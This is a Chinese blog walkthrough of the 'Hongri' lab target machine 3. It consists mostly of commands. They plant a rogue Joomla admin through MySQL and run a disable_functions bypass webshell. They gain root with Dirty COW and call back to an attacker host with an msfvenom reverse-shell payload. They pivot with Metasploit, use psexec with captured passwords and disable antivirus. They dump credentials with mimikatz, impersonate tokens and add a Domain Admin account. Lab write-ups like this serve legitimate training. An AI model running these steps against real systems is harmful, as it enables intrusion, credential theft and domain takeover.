红日靶机三 - 走看看

zoukankan html css js c++ java

红日靶机三

信息收集

testuser / cvcvgjASD!@

爆破失败

登录数据成功

joomlaCMS公开漏洞

mysql -uroot -p123 -h 192.168.1.110

INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

账号密码admin2:secret

登陆成功

开启了disable_functions

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

进行文件上传

http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

adduser wwwuser

passwd wwwuser_123Aqx

远程登录

文件上传

[wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh

[wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh

根据版本

本地下载文件上传

gcc -pthread 40839.c -o dirty -lcrypt

[wwwuser@localhost tmp]$ chmod 777 dirty

[wwwuser@localhost tmp]$ rm -rf passwd.bak

[wwwuser@localhost tmp]$ ./dirty 123.com

[wwwuser@localhost tmp]$mv /tmp/passwd.bak /etc/passwd

su firefart 123.com

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.128

msf5 exploit(multi/handler) > set lport 441

msf5 exploit(multi/handler) > run

run autoroute -s 192.168.93.0/24

run autoroute -p

主机探测

use auxiliary/scanner/discovery/arp_sweep

set rhosts 192.168.93.1/24

set threads 10

run

msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24

msf5 auxiliary(scanner/smb/smb_version) > run

爆破密码

登录20

msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20

rhost => 192.168.93.20

msf5 exploit(windows/smb/psexec) > set smbuser administrator

smbuser => administrator

msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD

smbpass => 123qwe!ASD

msf5 exploit(windows/smb/psexec) > run

查看进程

迁移进程

getpid

run post/windows/manage/migrate

使用sysinfo命令查看目标机的系统信息

route命令查看完整的网络设置

run post/windows/manage/killav命令关闭系统杀毒软件

run post/windows/gather/enum_logged_on_users列举当前登录靶机用户

run post/windows/gather/enum_applications列举安装在系统上的应用程序

使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码

load mimikatz

kerberos

msv

use incognito #help incognito 查看帮助

list_tokens -u #查看可用的token

impersonate_token 'NT AUTHORITYSYSTEM' #假冒SYSTEM token

或者impersonate_token NT AUTHORITY\SYSTEM #不加单引号需使用\

execute -f cmd.exe -i –t # -t 使用假冒的token 执行

或者直接shell

rev2self #返回原始token

发现TESTadministrator为域控管理员账号

添加账户

meterpreter > rev2self

meterpreter > add_user bing 1234.com -h 192.168.93.10

meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10

net use \192.168.93.10ipc$ 1234.com /user:TESTing

dir \192.168.93.10c$

参考文章

http://yugod.xmutsec.com/index.php/2020/07/23/90.html

https://www.cnblogs.com/Yang34/p/11407274.html

https://www.jianshu.com/p/dc7f42ef056f

https://xz.aliyun.com/t/2536

https://www.jianshu.com/p/df72d1ee1e3e

查看全文

相关阅读:
数组快速排序法
 javascript 的基本优化
 wdlinux mysql innodb的安装
 中文逗号替换为英文逗号 ,中英文逗号互换
 wdlinux 编译pdo_mysql
nodejs 简单对mongodb 操作
 node.js 安装
 开启 mysql 的远程连接功能
 文件下载到本地
 webpack基础+webpack配置文件常用配置项介绍+webpack-dev-server

原文地址：https://www.cnblogs.com/bingtang123/p/13548976.html